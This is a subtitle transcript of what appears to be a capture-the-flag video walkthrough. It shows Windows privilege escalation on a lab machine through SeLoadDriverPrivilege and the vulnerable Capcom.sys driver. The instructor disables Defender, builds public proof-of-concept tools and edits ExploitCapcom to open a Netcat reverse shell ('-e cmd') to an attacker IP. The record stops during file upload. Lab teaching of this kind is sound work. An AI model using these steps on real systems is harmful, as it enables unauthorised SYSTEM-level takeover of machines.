1
00:00:00,210 --> 00:00:05,340
All right, so we've got this shell on the box and we need to sort of assess our situation, we need

2
00:00:05,340 --> 00:00:06,360
to gain our bearings.

3
00:00:06,360 --> 00:00:10,140
We need to sort of figure out, you know, what is the attack surface of this machine?

4
00:00:10,140 --> 00:00:13,640
How can we vertically escalate our privileges?

5
00:00:14,130 --> 00:00:16,010
So there's a couple of things we can do, right.

6
00:00:16,100 --> 00:00:18,390
The first thing I like to do is just confirm my username.

7
00:00:19,770 --> 00:00:21,690
So my username is svc-print.

8
00:00:22,590 --> 00:00:27,370
So I'm most likely a printer service running on the FABRICORP domain.

9
00:00:27,630 --> 00:00:29,070
Well, what permissions do I have?

10
00:00:29,070 --> 00:00:33,690
What groups am I a part of? net user, and then I type svc-print.

11
00:00:34,770 --> 00:00:36,220
You can get a list of this, right.

12
00:00:36,280 --> 00:00:41,460
So immediately we can see we have a local group membership to Print Operators and a global group membership

13
00:00:41,460 --> 00:00:46,230
to Domain Users and IT Accounts. We have no local administrative privileges on this box.

14
00:00:46,860 --> 00:00:47,240
Right.

15
00:00:47,250 --> 00:00:49,530
So we are not a privileged user.

16
00:00:49,800 --> 00:00:52,830
And if we just type net user, you can see a list of all the users on the machine.

17
00:00:53,040 --> 00:00:56,700
So we're not trying to horizontally escalate our privileges.

18
00:00:56,710 --> 00:00:58,110
In other words, we could do that.

19
00:00:58,110 --> 00:00:58,830
We could try that.

20
00:00:58,830 --> 00:01:03,360
We could, you know, see if there are credentials left on this box.

21
00:01:03,360 --> 00:01:09,900
You know, maybe there's a backup file located inside of this svc-print Documents directory, or maybe there's

22
00:01:09,900 --> 00:01:12,600
a spreadsheet that contains credentials, maybe as toxin's potential.

23
00:01:12,870 --> 00:01:15,180
And maybe she's not an administrator, but we can log in as her.

24
00:01:15,180 --> 00:01:20,880
And then, you know, she has access to a SQL Server database, which we can then run xp_cmdshell against

25
00:01:20,880 --> 00:01:25,760
and then, you know, escalate to another user until we eventually arrive at an administrator.

26
00:01:26,220 --> 00:01:27,660
That's a possible vector.

27
00:01:28,050 --> 00:01:34,680
But an easier approach, a quicker approach is just to see what permissions this particular account

28
00:01:34,680 --> 00:01:34,890
has.

29
00:01:34,890 --> 00:01:35,170
So for that,

30
00:01:35,170 --> 00:01:37,890
the command is whoami

31
00:01:38,220 --> 00:01:38,640
/priv.

32
00:01:39,570 --> 00:01:46,530
I get a nice snapshot of the privileges for my particular account on this computer, which, by the

33
00:01:46,530 --> 00:01:47,610
way, is called Fuse.

34
00:01:48,030 --> 00:01:48,350
Right.

35
00:01:48,840 --> 00:01:49,510
So what can I do?

36
00:01:49,650 --> 00:01:51,530
Well, I have the SeMachineAccountPrivilege.

37
00:01:51,570 --> 00:01:54,900
This means I can add workstations to the domain. Whoop-de-do, right.

38
00:01:55,200 --> 00:01:57,120
I mean, that's not really an exploitable attack vector.

39
00:01:57,120 --> 00:02:04,890
So we're going to move on to the next one: SeLoadDriverPrivilege, load and unload device drivers, enabled.

40
00:02:06,540 --> 00:02:08,820
OK, so this should have your ears perked up a little bit.

41
00:02:09,130 --> 00:02:11,430
You might not know how to exploit this, but just think about this.

42
00:02:11,430 --> 00:02:12,090
What it's saying.

43
00:02:13,680 --> 00:02:20,250
It's saying that my particular account, the one I'm running as, svc-print, on this particular system, Fuse,

44
00:02:21,720 --> 00:02:26,280
can load drivers on the system.

45
00:02:27,420 --> 00:02:30,210
So perhaps I can load a malicious driver, right.

46
00:02:30,420 --> 00:02:32,520
I mean, I can dynamically load device drivers.

47
00:02:33,090 --> 00:02:42,780
So essentially I can execute code in kernel space and that could be our path toward victory.

48
00:02:42,990 --> 00:02:43,380
Right.

49
00:02:43,590 --> 00:02:48,930
So let's go ahead and Google this to see if there's a way to find a path here.

50
00:02:48,960 --> 00:02:56,340
So let's just go ahead and open up the Web browser and we're going to type in SeLoadDriverPrivilege.

51
00:02:56,340 --> 00:02:57,450
Just copy that to the clipboard.

52
00:02:58,230 --> 00:02:58,710
I grab it.

53
00:02:59,850 --> 00:03:00,720
So we're in Google.

54
00:03:01,110 --> 00:03:03,960
We're not signed in, as you can see, in the upper right corner.

55
00:03:03,960 --> 00:03:06,510
And we're just going to go ahead and type like that.

56
00:03:06,780 --> 00:03:09,330
And immediately we see the privilege escalation autocomplete.

57
00:03:09,330 --> 00:03:09,510
Right.

58
00:03:09,510 --> 00:03:12,420
So Google is telling us it's basically reading our minds.

59
00:03:12,420 --> 00:03:17,700
It knows that this is what we want to do based on the search engine optimization for this phrase.

60
00:03:18,270 --> 00:03:20,820
I'm not signed in, so it's not pulling this from my search history.

61
00:03:24,160 --> 00:03:28,990
And let's see, we've got something here, Abusing SeLoadDriverPrivilege, so this is an excellent

62
00:03:28,990 --> 00:03:31,120
article by the folks at Tarlogic.

63
00:03:31,130 --> 00:03:34,390
It behooves you to read this.

64
00:03:34,960 --> 00:03:36,760
There's a lot of valuable information here.

65
00:03:37,810 --> 00:03:40,870
And so you want to know how this particular exploit works.

66
00:03:40,870 --> 00:03:45,700
You don't just want to execute scripts because then you would be a script kiddie, which is the designation

67
00:03:45,700 --> 00:03:49,590
we're trying to avoid, essentially.

68
00:03:50,350 --> 00:03:53,380
So let's see what we can do here.

69
00:03:54,460 --> 00:03:58,590
And what I'm doing is I'm just looking for the PoC, and you can see here EoPLoadDriver.

70
00:03:58,600 --> 00:03:59,740
So let's go ahead and control-

71
00:03:59,740 --> 00:04:03,540
click that to open it up, and you see this is a .cpp file.

72
00:04:03,730 --> 00:04:04,900
So it's a C++ file.

73
00:04:05,950 --> 00:04:07,620
Now, there's a couple of options, right.

74
00:04:07,630 --> 00:04:11,800
We could try to build this exploit on our local attacking system.

75
00:04:11,800 --> 00:04:14,340
But it's a Linux box and we're trying to exploit a Windows machine.

76
00:04:14,860 --> 00:04:17,500
So typically, in my experience, it makes more sense.

77
00:04:17,500 --> 00:04:23,280
You have fewer problems and errors if you just build the exploit on the target machine's

78
00:04:23,290 --> 00:04:27,540
operating system; it's just the easiest path to exploitation.

79
00:04:27,550 --> 00:04:30,350
So we're going to go ahead and set that up.

80
00:04:30,370 --> 00:04:33,400
Let's go ahead and fire up our Windows box and see what we can do here.

81
00:04:33,670 --> 00:04:36,460
So let's see.

82
00:04:36,460 --> 00:04:38,350
Windows 10, boot up this puppy.

83
00:04:41,730 --> 00:04:43,610
So here we are in our Windows box.

84
00:04:44,580 --> 00:04:53,150
Let's go ahead and open up Chrome, drag this down here. I like having everything in one place, OK?

85
00:04:54,000 --> 00:04:55,400
You know, everybody's OCD in some way.

86
00:04:55,410 --> 00:04:56,130
That's my OCD.

87
00:04:56,140 --> 00:04:59,850
I like to have all my little icons down there and delete this one from the desktop.

88
00:05:07,720 --> 00:05:18,340
All right, so here we are in Google, and let's just go ahead and type that, SeLoadDriver

89
00:05:18,970 --> 00:05:19,660
Privilege.

90
00:05:24,460 --> 00:05:26,020
We've got the Tarlogic post.

91
00:05:28,560 --> 00:05:34,230
Skip down to exploitation and let's see if we can find out how to actually run this.

92
00:05:37,020 --> 00:05:39,690
Control-click this guy, and I saw something else here.

93
00:05:41,030 --> 00:05:45,720
Go down a little bit so you can see there's basically a bunch of different parts to this.

94
00:05:45,720 --> 00:05:45,980
Right.

95
00:05:46,380 --> 00:05:48,930
So I don't know how to describe this.

96
00:05:48,930 --> 00:05:50,520
So there's actually three parts to this exploit.

97
00:05:51,960 --> 00:05:55,050
It's not just one thing that you compile and click.

98
00:05:55,710 --> 00:05:58,980
So first you have to load a vulnerable,

99
00:05:59,400 --> 00:06:09,630
Microsoft-signed binary into the registry, and that's what this EoPLoadDriver project does.

100
00:06:09,750 --> 00:06:16,800
OK, and we're going to use Capcom.sys because it allows a user-mode process to execute in kernel

101
00:06:16,800 --> 00:06:17,220
space.

102
00:06:17,640 --> 00:06:24,720
And that's the vulnerability that we're going to exploit. Once you have the driver loaded,

103
00:06:24,940 --> 00:06:33,140
we need to exploit it, and we can use this tool here, ExploitCapcom.

104
00:06:33,990 --> 00:06:38,220
And essentially what we can do is we can go to the source, we can tell it what executable we want to

105
00:06:38,220 --> 00:06:45,320
load with SYSTEM permissions based on the vulnerable driver loaded in memory.

106
00:06:45,960 --> 00:06:52,410
And this is where we're going to go ahead and use Netcat to shovel the shell from the victim to our

107
00:06:53,010 --> 00:06:53,910
attacker box.

108
00:06:54,330 --> 00:06:58,320
But there are some modifications we need to make to the code, and we're going to work through that.

109
00:06:58,320 --> 00:06:59,880
I'm going to walk you through that step by step.

110
00:06:59,880 --> 00:07:06,450
So we actually also need the Capcom.sys file, which, if you go back to the Tarlogic post, it tells

111
00:07:06,450 --> 00:07:10,860
you, you know, the hash for it, but they don't actually give you the file.

112
00:07:10,860 --> 00:07:16,080
And I guess that's because they don't want to make it easy or too convenient for attackers to take

113
00:07:16,080 --> 00:07:18,420
the next step of compromising the host using this exploit.

114
00:07:19,470 --> 00:07:25,860
But we can actually find it. Just type Capcom.sys. I think it's Capcom.sys

115
00:07:25,860 --> 00:07:26,790
FuzzySecurity.

116
00:07:26,790 --> 00:07:30,300
Those are the guys that actually published this.

117
00:07:31,440 --> 00:07:31,650
Yeah.

118
00:07:31,710 --> 00:07:32,970
FuzzySecurity Capcom.

119
00:07:35,990 --> 00:07:37,590
Here it is, FuzzySecurity GitHub.

120
00:07:38,270 --> 00:07:41,960
Here we go, FuzzySecurity Capcom GitHub.

121
00:07:44,220 --> 00:07:45,770
Capcom.sys, it's the driver.

122
00:07:50,210 --> 00:07:53,900
Now, one thing we're going to have to do is disable Windows Defender, because it's going to immediately

123
00:07:53,900 --> 00:07:59,220
catch this vulnerable driver when we try to download it. SmartScreen is going to kill it.

124
00:07:59,240 --> 00:08:00,290
Windows Defender is going to kill it.

125
00:08:00,290 --> 00:08:01,250
We can't just download it.

126
00:08:02,930 --> 00:08:04,330
It's not quite that simple.

127
00:08:05,840 --> 00:08:06,950
So disable Defender.

128
00:08:18,430 --> 00:08:21,280
Manage settings, then disable all of this stuff.

129
00:08:28,540 --> 00:08:33,230
Real-time protection off, cloud-delivered protection off, automatic sample submission off.

130
00:08:34,580 --> 00:08:41,250
All right, let's just make this box naked because we need to do our testing here.

131
00:08:41,930 --> 00:08:42,290
All right.

132
00:08:42,980 --> 00:08:43,610
Good to go.

133
00:08:44,540 --> 00:08:45,530
It's going to download.

134
00:08:50,180 --> 00:08:53,210
It's saying this file can harm our computer, so even Chrome is trying to stop us.

135
00:08:53,310 --> 00:08:54,680
All right, we're going to go ahead and keep it.

136
00:08:55,430 --> 00:08:57,410
Hopefully it will honor our request.

137
00:08:58,310 --> 00:09:00,020
And then let's go ahead and download these other files.

138
00:09:07,320 --> 00:09:08,270
What is it?

139
00:09:14,970 --> 00:09:20,970
And we'll download this zip as well; this is the proof of concept for abusing SeLoadDriverPrivilege.

140
00:09:25,820 --> 00:09:28,430
All right, so apparently we've got everything I'm going to close out of Chrome.

141
00:09:31,760 --> 00:09:33,140
See if we can find our downloads.

142
00:09:37,340 --> 00:09:38,120
Extract everything.

143
00:09:40,660 --> 00:09:41,500
Extract all.

144
00:09:54,690 --> 00:09:55,380
Extract all.

145
00:10:28,280 --> 00:10:34,950
Delete everything that we don't need and just control clicking all the stuff that we don't care about.

146
00:10:38,520 --> 00:10:43,440
All right, so let's see, we've got EoPLoadDriver, we've got ExploitCapcom-master. What is EoPLoadDriver?

147
00:10:45,600 --> 00:10:49,920
We have a raw C++ file, so let's go ahead and open a new Visual Studio project and just dump this in

148
00:10:49,920 --> 00:10:50,180
there.

149
00:10:52,540 --> 00:10:58,150
Visual Studio 2019, and by the way, Visual Studio is free; I'm using the Community edition.

150
00:10:58,150 --> 00:11:02,740
Anyone can download it just by Googling Visual Studio and you'll have it there.

151
00:11:03,070 --> 00:11:04,770
There's a section there where you can install it.

152
00:11:06,250 --> 00:11:07,380
So we've got Visual Studio.

153
00:11:07,390 --> 00:11:09,340
Let's go ahead and create a new project.

154
00:11:11,620 --> 00:11:12,280
And what do we want?

155
00:11:12,310 --> 00:11:13,550
We don't want all languages, right?

156
00:11:13,570 --> 00:11:16,990
We just want C++ because it was a dot CPP extension.

157
00:11:17,710 --> 00:11:18,580
We want a console app.

158
00:11:18,640 --> 00:11:18,790
Right.

159
00:11:18,820 --> 00:11:20,960
We just want it to run in the Windows terminal.

160
00:11:20,990 --> 00:11:23,980
You know, we don't want anything fancy here. Platforms?

161
00:11:23,980 --> 00:11:24,340
Nope.

162
00:11:24,580 --> 00:11:28,600
Just Windows. And project types?

163
00:11:29,780 --> 00:11:31,660
No, let's just do console.

164
00:11:34,890 --> 00:11:36,930
That's it, Console App. Next.

165
00:11:39,230 --> 00:11:47,510
And let's just name it EoPLoadDriver; it's going to put it in this folder right here.

166
00:11:49,400 --> 00:11:50,390
Copy that to the clipboard.

167
00:11:50,600 --> 00:11:52,780
I'm going to place the solution and the project in the same directory.

168
00:11:52,790 --> 00:11:54,410
Just makes it a little bit easier to find things

169
00:11:57,110 --> 00:11:57,830
while that loads.

170
00:11:57,830 --> 00:12:03,350
I'm going to go ahead and pop open a new Explorer window at that path.

171
00:12:04,960 --> 00:12:05,900
So I'm just thinking ahead.

172
00:12:09,220 --> 00:12:09,610
All right.

173
00:12:11,110 --> 00:12:18,010
Let's go back to Visual Studio. That looks good. Looks like it's still trying to create the project;

174
00:12:18,040 --> 00:12:19,200
the image is running really slowly.

175
00:12:19,210 --> 00:12:23,620
I don't know why you may not notice that through the recording, because I did a lot of editing so that

176
00:12:23,620 --> 00:12:24,880
you don't have to suffer like I have been.

177
00:12:26,320 --> 00:12:27,310
But sometimes that happens, right?

178
00:12:27,310 --> 00:12:28,740
Sometimes your virtual machine just sucks.

179
00:12:28,750 --> 00:12:33,520
You know, I've already tried bumping up the memory and the CPU, and for some reason it's still crippling

180
00:12:33,520 --> 00:12:37,410
my... it's just running at like 100 percent constantly, which is kind of annoying.

181
00:12:39,670 --> 00:12:47,080
Here we go, everything nice and loaded, EoPLoadDriver.cpp, source files, and we should see the zip

182
00:12:47,080 --> 00:12:47,590
file here.

183
00:12:47,710 --> 00:12:48,040
We do.

184
00:12:48,220 --> 00:12:49,300
Right there it is.

185
00:12:50,320 --> 00:12:51,470
So what do we want to do?

186
00:12:52,240 --> 00:12:53,550
This is obviously not what we want to do.

187
00:12:53,560 --> 00:12:54,700
We don't want to print Hello World.

188
00:12:55,240 --> 00:12:56,050
So let's copy.

189
00:12:57,850 --> 00:13:03,880
the contents of EoPLoadDriver.cpp into there, right. So I wonder if I could just drag and drop this and,

190
00:13:03,880 --> 00:13:04,360
like this.

191
00:13:06,940 --> 00:13:11,050
OK, OK, so let's just do a little Control-X

192
00:13:12,710 --> 00:13:13,460
to cut that.

193
00:13:19,940 --> 00:13:23,030
Control-V to paste.

194
00:13:23,930 --> 00:13:25,940
All right, so we've got our three lines of code in here.

195
00:13:28,090 --> 00:13:37,970
And we can see, you know, what this is doing. This looks like this was written by Oscar Mallo, and

196
00:13:38,410 --> 00:13:39,400
what we have.

197
00:13:44,690 --> 00:13:47,150
So it's good to just, you know, just to give the code a quick glance.

198
00:13:47,180 --> 00:13:50,960
I mean, not that we don't trust Tarlogic, but we just want to make sure that we're not going to introduce

199
00:13:50,960 --> 00:13:55,190
any kind of security holes into our system

200
00:13:57,320 --> 00:13:59,480
that's unexpected or outside of our knowledge.

201
00:13:59,480 --> 00:14:04,130
So everything in here looks really good, and it even tells you how you can run this tool.

202
00:14:04,530 --> 00:14:04,790
Right.

203
00:14:04,850 --> 00:14:08,960
So you can type the driver name, and then you need to give it a registry key, so we can create this. We can

204
00:14:08,960 --> 00:14:11,000
call this vonne or whatever you want to name it.

205
00:14:12,290 --> 00:14:16,370
And then we're just going to basically give it the full path to the driver, which is actually

206
00:14:16,370 --> 00:14:18,530
called Capcom.sys.

207
00:14:19,850 --> 00:14:24,920
So, compiling: we don't want to compile it in Debug, we want to compile it for Release, and we're running

208
00:14:24,920 --> 00:14:26,630
up against a 64-bit system.

209
00:14:28,280 --> 00:14:33,260
So we're going to go ahead and say x64, and then we're going to build it.

210
00:14:35,710 --> 00:14:43,000
Build solution, hopefully we don't get any errors, or if we do get errors, hopefully we know how

211
00:14:43,000 --> 00:14:47,480
to fix it and usually we can fix them pretty easily just by Googling around or thinking things through.

212
00:14:49,780 --> 00:14:51,760
You can see the build process happening right here.

213
00:14:51,760 --> 00:15:00,970
It failed: cannot open source file 'stdafx.h', no such file or directory.

214
00:15:03,610 --> 00:15:07,360
So, you know, this is the only file included with quotes and not brackets.

215
00:15:08,050 --> 00:15:12,650
So I bet this tool is looking for this file in the local directory, which isn't present.

216
00:15:12,670 --> 00:15:13,420
It won't compile.

217
00:15:14,530 --> 00:15:15,790
The question is, do we need this?

218
00:15:16,300 --> 00:15:19,870
And I don't know if we do, but let's just comment it out.

219
00:15:21,520 --> 00:15:26,050
I'm going to put forward slashes in front of it and see if we can rebuild it without it.

220
00:15:28,960 --> 00:15:31,190
I think this is like a generic C++ file.

221
00:15:31,210 --> 00:15:31,960
We might not need it.

222
00:15:36,400 --> 00:15:39,110
All right, build: 1 succeeded, 0 failed.

223
00:15:39,160 --> 00:15:41,170
I love to see that.

224
00:15:42,010 --> 00:15:43,080
OK, so where are we?

225
00:15:43,180 --> 00:15:45,940
We are in this folder right here. Copy the path.

226
00:15:49,440 --> 00:15:50,640
Right-click, copy.

227
00:15:57,420 --> 00:16:02,640
And here we go, you see the timestamp matches just a minute ago, so I'm going to right click this,

228
00:16:02,700 --> 00:16:06,580
I'm going to copy it and put this in the Downloads folder.

229
00:16:07,020 --> 00:16:07,320
All right.

230
00:16:07,320 --> 00:16:09,640
So now let's look at this ExploitCapcom-master.

231
00:16:10,560 --> 00:16:10,800
All right.

232
00:16:10,800 --> 00:16:12,470
So we have a Visual Studio solution file.

233
00:16:12,810 --> 00:16:13,560
I'm going to open that.

234
00:16:14,520 --> 00:16:17,100
So: you should only open projects from a trustworthy source.

235
00:16:17,620 --> 00:16:18,730
Would you like to open this project?

236
00:16:18,750 --> 00:16:19,170
I would.

237
00:16:19,530 --> 00:16:21,110
I'm glad Visual Studio warns me about that.

238
00:16:21,120 --> 00:16:21,840
That's nice of them.

239
00:16:23,660 --> 00:16:25,520
The project is loaded and ready to use.

240
00:16:25,760 --> 00:16:33,330
All right, you might say, well, where's the project if it doesn't load for you?

241
00:16:33,350 --> 00:16:38,040
We can always load it in the Solution Explorer on the right side of the screen: a quick little flip of

242
00:16:38,040 --> 00:16:42,800
the arrow, go down to Source Files and then double-click the file. And notice,

243
00:16:42,800 --> 00:16:47,220
here you see the stdafx.h file is here.

244
00:16:48,440 --> 00:16:51,440
So that's probably why the other one didn't compile because it was simply missing that file.

245
00:16:52,760 --> 00:16:53,750
All right, here we go.

246
00:16:53,840 --> 00:16:55,670
ExploitCapcom.

247
00:16:57,410 --> 00:17:00,260
Let's scroll down here and see if there's anything we need to modify.

248
00:17:01,550 --> 00:17:03,680
So I'm just reading through the comments, right.

249
00:17:03,950 --> 00:17:07,180
Represents the layout of an input buffer for the vulnerable IOCTL.

250
00:17:07,430 --> 00:17:13,040
We don't really need to know the details of how this works, but we need to know what's here.

251
00:17:14,000 --> 00:17:19,670
Now, here it says exploits Capcom.sys, and this is if the exploit failed.

252
00:17:20,680 --> 00:17:23,680
So it's kind of hard to see how to get into this condition.

253
00:17:25,040 --> 00:17:26,120
We don't need to worry about that yet.

254
00:17:26,820 --> 00:17:28,220
Only if it fails, then we need to look there.

255
00:17:30,610 --> 00:17:35,170
OK, this is what I'm interested in, LaunchShell. What? Launches a command shell, and you can see here

256
00:17:35,170 --> 00:17:39,160
it's just going to launch cmd.exe as SYSTEM.

257
00:17:39,940 --> 00:17:40,690
We don't want to do that.

258
00:17:40,690 --> 00:17:40,830
Right.

259
00:17:40,840 --> 00:17:42,780
We want it to kick back a reverse shell to us.

260
00:17:43,630 --> 00:17:48,580
So let's see, this is what's happening here: this string

261
00:17:50,810 --> 00:17:59,840
is being saved to, it looks like, a character array called CommandLine, which is then being

262
00:17:59,840 --> 00:18:01,960
passed to the CreateProcess function.

263
00:18:01,970 --> 00:18:03,830
So let's see if we can Google CreateProcess.

264
00:18:06,490 --> 00:18:10,990
I'm seeing CreateProcess as the first hit on the Microsoft Web page, so let's go and click there.

265
00:18:11,020 --> 00:18:15,220
That's probably the documentation that will give us the syntax of how to use this function.

266
00:18:17,260 --> 00:18:18,160
Yeah, this is what we want.

267
00:18:18,170 --> 00:18:18,850
See, the syntax.

268
00:18:19,600 --> 00:18:26,460
And you can see here, it's like we're passing it nine parameters... ten, ten.

269
00:18:26,920 --> 00:18:29,130
The first thing we pass in is the application name.

270
00:18:30,820 --> 00:18:32,470
And let's see, it actually tells us what that is.

271
00:18:32,720 --> 00:18:39,670
OK, so in this case, the application is cmd.exe, and we probably want cmd.exe to launch Netcat,

272
00:18:40,270 --> 00:18:44,410
so we can upload Netcat to the victim and then have it execute it, and see if we can figure out how

273
00:18:44,410 --> 00:18:44,830
to do that.

274
00:18:45,310 --> 00:18:48,280
Second parameter is a command line.

275
00:18:49,240 --> 00:18:52,810
So the application comes first, then comes the command line, the command line to be executed.

276
00:18:52,950 --> 00:18:53,440
All right.

277
00:18:54,940 --> 00:19:01,690
So here you see they're actually passing cmd as the application and the command line.

278
00:19:03,160 --> 00:19:03,950
We're going to change that.

279
00:19:04,390 --> 00:19:08,590
So we're going to do another TCHAR, argument.

280
00:19:11,260 --> 00:19:16,140
It's going to be the argument we're going to use, we're going to pass to cmd. Immediately I'm going

281
00:19:16,150 --> 00:19:18,550
to say /c. Why am I doing that?

282
00:19:19,000 --> 00:19:24,190
Because let me show you real quick, if I open up the command line.

283
00:19:27,030 --> 00:19:32,460
I type whoami, it tells me my username and my workstation hostname, right?

284
00:19:34,670 --> 00:19:39,290
But if I type cmd /c whoami?

285
00:19:41,450 --> 00:19:43,610
Does the same thing and what's happening here?

286
00:19:44,060 --> 00:19:52,100
If I type cmd /?, /c carries out the command specified by the string

287
00:19:52,100 --> 00:19:52,880
and then terminates.

288
00:19:53,120 --> 00:19:53,410
Right.

289
00:19:54,500 --> 00:20:00,140
So we want cmd to carry out Netcat and then terminate.

290
00:20:00,800 --> 00:20:05,250
We want it to send us the shell and then die, so we can say nc.exe.

291
00:20:07,040 --> 00:20:09,530
And what's the syntax for Netcat?

292
00:20:09,560 --> 00:20:10,130
We don't know.

293
00:20:10,710 --> 00:20:16,910
We can go back to our Kali box, split the screen, and use sudo locate

294
00:20:16,980 --> 00:20:18,830
netcat, nc.exe.

295
00:20:21,500 --> 00:20:22,040
Got it here.

296
00:20:25,790 --> 00:20:30,080
You know, copy this to our current directory.

297
00:20:30,080 --> 00:20:30,560
Do we have it?

298
00:20:30,740 --> 00:20:31,190
We do.

299
00:20:31,970 --> 00:20:34,490
And we can't run this one here.

300
00:20:34,490 --> 00:20:37,680
But if we do this, we say nc -h.

301
00:20:37,750 --> 00:20:41,300
This is the Linux version of Netcat, which is similar to the Windows version.

302
00:20:41,990 --> 00:20:45,470
This is the Windows version and the Linux version.

303
00:20:46,190 --> 00:20:51,810
But what we want to do, we want Netcat, I mean, we want the victim to connect back to us.

304
00:20:51,810 --> 00:20:53,960
I say Netcat options.

305
00:20:53,960 --> 00:20:54,840
What options do we want?

306
00:20:55,520 --> 00:21:01,250
We want -e, program to exec after connect.

307
00:21:01,400 --> 00:21:02,180
Dangerous, right?

308
00:21:02,180 --> 00:21:02,870
That's what we want.

309
00:21:02,870 --> 00:21:07,580
We want it to send -e cmd back to us.

310
00:21:08,000 --> 00:21:11,450
How do we specify us? Let's see here: hostname,

311
00:21:11,600 --> 00:21:13,040
which would be our attacker IP.

312
00:21:16,250 --> 00:21:16,550
Right.

313
00:21:17,770 --> 00:21:19,790
10.10.14.12.

314
00:21:19,790 --> 00:21:21,320
And then a port that we're listening on.

315
00:21:21,770 --> 00:21:28,040
We can listen on port 9001. Let's copy that and put that into our code: 10.10.14.12

316
00:21:28,250 --> 00:21:30,920
9001, and it'll send back immediately.

317
00:21:32,390 --> 00:21:40,430
Then what we'll do is, we'll pass this to the CreateProcess function right here.

318
00:21:40,910 --> 00:21:47,690
So we'll say argument, like so, and then these other variables:

319
00:21:47,690 --> 00:21:48,960
null pointer, null pointer,

320
00:21:49,100 --> 00:21:51,680
FALSE, CREATE_NEW_CONSOLE,

321
00:21:51,980 --> 00:21:55,130
null pointer, null pointer, StartupInfo, ProcessInformation.

322
00:21:55,130 --> 00:21:56,750
Oh, we can leave this as the default.

323
00:21:57,440 --> 00:21:59,780
The reason I know that's because I've already read through this.

324
00:22:00,050 --> 00:22:00,370
Right.

325
00:22:01,700 --> 00:22:06,920
And I can see all this other information; it's fine if we leave everything else the way it is.

326
00:22:08,480 --> 00:22:09,590
So I'm going to close out of Chrome.

327
00:22:12,020 --> 00:22:12,620
That looks good.

328
00:22:13,820 --> 00:22:16,610
Change this to Release, x64.

329
00:22:16,610 --> 00:22:17,120
That's good.

330
00:22:17,120 --> 00:22:18,230
And let's just build this puppy.

331
00:22:18,530 --> 00:22:19,720
I really can't wait to get off this

332
00:22:19,790 --> 00:22:21,760
Windows box.

333
00:22:21,950 --> 00:22:22,530
It's so slow.

334
00:22:23,370 --> 00:22:24,530
I've got an error message.

335
00:22:24,540 --> 00:22:29,960
Syntax. Looks like we forgot a semicolon, and I can see that right here.

336
00:22:30,740 --> 00:22:31,880
That should do the trick.

337
00:22:31,910 --> 00:22:33,320
Notice how a semicolon exists here.

338
00:22:34,100 --> 00:22:35,210
You need to also have one here.

339
00:22:37,310 --> 00:22:39,380
Build, build solution.

340
00:22:40,310 --> 00:22:40,580
Right.

341
00:22:40,580 --> 00:22:41,420
So it succeeded.

342
00:22:42,350 --> 00:22:43,310
That is good news.

343
00:22:43,310 --> 00:22:49,520
Let's go ahead and grab this file and copy it and put it in our download folder.

344
00:22:49,550 --> 00:22:51,470
We're going to send everything over to our attacker machine.

345
00:22:51,470 --> 00:22:53,900
SMB is the easiest way I've found.

346
00:22:53,900 --> 00:22:54,830
Just move stuff around.

347
00:22:58,120 --> 00:22:58,870
All right, sweet.

348
00:22:59,530 --> 00:23:02,950
So now let's go to our Kali box and let's set up a file share.

349
00:23:05,210 --> 00:23:11,370
Clear. It's in this folder, sweet, and let's see, what can we do?

350
00:23:11,390 --> 00:23:16,370
Let's go ahead and do sudo impacket

351
00:23:19,100 --> 00:23:19,910
smbserver.

352
00:23:20,330 --> 00:23:20,810
Yes.

353
00:23:21,220 --> 00:23:21,480
All right.

354
00:23:21,510 --> 00:23:28,820
So what we can do is, we see the impacket smbserver, we'll use SMB2 support, because Windows 10, like this,

355
00:23:29,100 --> 00:23:33,510
if you don't have it, sometimes it doesn't connect because it considers it a vulnerability, assessment

356
00:23:33,530 --> 00:23:33,880
team, is it?

357
00:23:34,310 --> 00:23:36,110
I support it from the file share.

358
00:23:37,640 --> 00:23:39,500
And you also need to put a username and password.

359
00:23:40,400 --> 00:23:49,630
So username, or to say, password, and then what we need next is a share name and a share path to

360
00:23:49,660 --> 00:23:50,000
your name.

361
00:23:50,450 --> 00:23:53,120
It's called exploits, path, current directory,

362
00:23:55,850 --> 00:23:56,920
and something happened.

363
00:23:57,900 --> 00:24:01,230
I think it's because I put two back takes instead of one to text.

364
00:24:01,340 --> 00:24:02,870
So let's go ahead, Ctrl

365
00:24:02,870 --> 00:24:04,820
Right, Right, Left, Right, Ctrl

366
00:24:04,820 --> 00:24:05,210
Left, right.

367
00:24:05,210 --> 00:24:08,120
This gets me through the parameters one word at a time.

368
00:24:08,690 --> 00:24:10,940
I think a shortcut now.

369
00:24:10,940 --> 00:24:12,770
Of course, we need our IP address.

370
00:24:15,110 --> 00:24:18,410
Grep it, is there, Ethernet adapter.

371
00:24:18,650 --> 00:24:23,150
So it's 192.168.38.128.

372
00:24:27,410 --> 00:24:28,990
Let's see if we can connect to this.

373
00:24:45,980 --> 00:24:54,020
\\192.168.38.128\exploits should prompt me for credentials.

374
00:24:54,020 --> 00:24:56,390
Hopefully it does. Yeah.

375
00:25:01,110 --> 00:25:03,680
Make sure I put the password in correctly, right?

376
00:25:04,440 --> 00:25:05,580
Remember my credentials.

377
00:25:06,330 --> 00:25:09,770
OK, we should see the root.

378
00:25:09,780 --> 00:25:12,210
We should just see nc.exe, and we do.

379
00:25:12,750 --> 00:25:17,340
So grab these files, drag them over.

380
00:25:19,380 --> 00:25:19,680
All right.

381
00:25:19,680 --> 00:25:22,680
And let's go back to our attacker box and make sure that we got everything we needed.

382
00:25:26,870 --> 00:25:27,180
Yep.

383
00:25:28,700 --> 00:25:36,170
All right, so this is interesting, this is an alternate data stream, ADS, that is included inside

384
00:25:36,170 --> 00:25:41,090
of files that are downloaded from the Internet, and that's how your web browser and Windows Defender know

385
00:25:41,750 --> 00:25:43,130
that a file might not be safe.

386
00:25:43,130 --> 00:25:46,850
And that's part of the reason why we got hit, that's part of the reason why Chrome actually,

387
00:25:49,670 --> 00:25:51,920
why Chrome complained when we tried to download this.

388
00:25:51,980 --> 00:25:56,240
For example, if I go cat Capcom, that's this Zone.Identifier.

389
00:25:56,260 --> 00:26:03,020
If I can see here, it's actually showing you that it came from this location, and a 3 means the Internet.

390
00:26:03,500 --> 00:26:05,350
This is also a data stream that got passed out.

391
00:26:05,360 --> 00:26:08,800
So that is actually really, really cool that we can see that.

392
00:26:09,410 --> 00:26:11,110
But let's not get too bogged down here.

393
00:26:11,120 --> 00:26:14,270
Let's upload all these things to our target computer.

394
00:26:14,690 --> 00:26:16,280
Now, where do we want to upload it?

395
00:26:17,090 --> 00:26:23,840
Let's go to the root directory, because it really depends, it's really important to learn where to

396
00:26:23,840 --> 00:26:24,500
upload things.

397
